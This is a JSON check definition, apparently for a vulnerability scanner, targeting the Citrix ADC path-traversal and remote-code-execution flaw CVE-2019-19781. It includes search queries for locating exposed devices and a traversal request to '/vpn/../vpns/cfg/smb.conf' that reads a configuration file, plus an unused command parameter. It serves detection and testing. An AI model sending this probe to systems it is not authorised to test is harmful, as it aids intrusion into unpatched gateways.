{
  "Name": "Citrix ADC RCE (CVE-2019-19781)",
  "Description": "An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.",
  "Product": "Citrix-ADC",
  "Homepage": "https://docs.citrix.com/en-us/citrix-adc.html",
  "DisclosureDate": "2019-12-27",
  "Author": "gobysec@gmail.com",
  "FofaQuery": "body=\"Citrix ADC\" && body=\"ns_login_inner_wrapper\"",
  "GobyQuery": "body=\"Citrix ADC\" && body=\"ns_login_inner_wrapper\"",
  "Level": "3",
  "Impact": "This issue may lead to Remote Code execution.",
  "Recommendation": "",
  "References": [
    "http://packetstormsecurity.com/files/155904/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution.html",
    "http://packetstormsecurity.com/files/155905/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution-Traversal.html",
    "http://packetstormsecurity.com/files/155930/Citrix-Application-Delivery-Controller-Gateway-10.5-Remote-Code-Execution.html",
    "http://packetstormsecurity.com/files/155947/Citrix-ADC-NetScaler-Directory-Traversal-Remote-Code-Execution.html",
    "http://packetstormsecurity.com/files/155972/Citrix-ADC-Gateway-Path-Traversal.html",
    "https://badpackets.net/over-25000-citrix-netscaler-endpoints-vulnerable-to-cve-2019-19781/",
    "https://forms.gle/eDf3DXZAv96oosfj6",
    "https://support.citrix.com/article/CTX267027",
    "https://twitter.com/bad_packets/status/1215431625766424576",
    "https://www.kb.cert.org/vuls/id/619785",
    "https://nvd.nist.gov/vuln/detail/CVE-2019-19781",
    "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781",
	"https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/"
  ],
  "HasExp": true,
  "ExpParams": [
    {
      "Name": "cmd",
      "Type": "input",
      "Value": "whoami"
    }
  ],
  "ExpTips": {
    "Type": "",
    "Content": ""
  },
  "ScanSteps": [
    "AND",
    {
      "Request": {
        "data": "",
        "data_type": "text",
        "follow_redirect": true,
        "method": "GET",
        "uri": "/vpn/../vpns/cfg/smb.conf"
      },
      "ResponseTest": {
        "checks": [
          {
            "bz": "",
            "operation": "==",
            "type": "item",
            "value": "200",
            "variable": "$code"
          },
		  {
            "bz": "",
            "operation": "contains",
            "type": "item",
            "value": "global",
            "variable": "$body"
          }
        ],
        "operation": "AND",
        "type": "group"
      }
    }
  ],
  "ExploitSteps": null,
  "Tags": null,
  "CVEIDs": [
    "CVE-2019-19781"
  ],
  "CVSSScore": "9.8",
  "AttackSurfaces": {
    "Application": null,
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": null
  }
}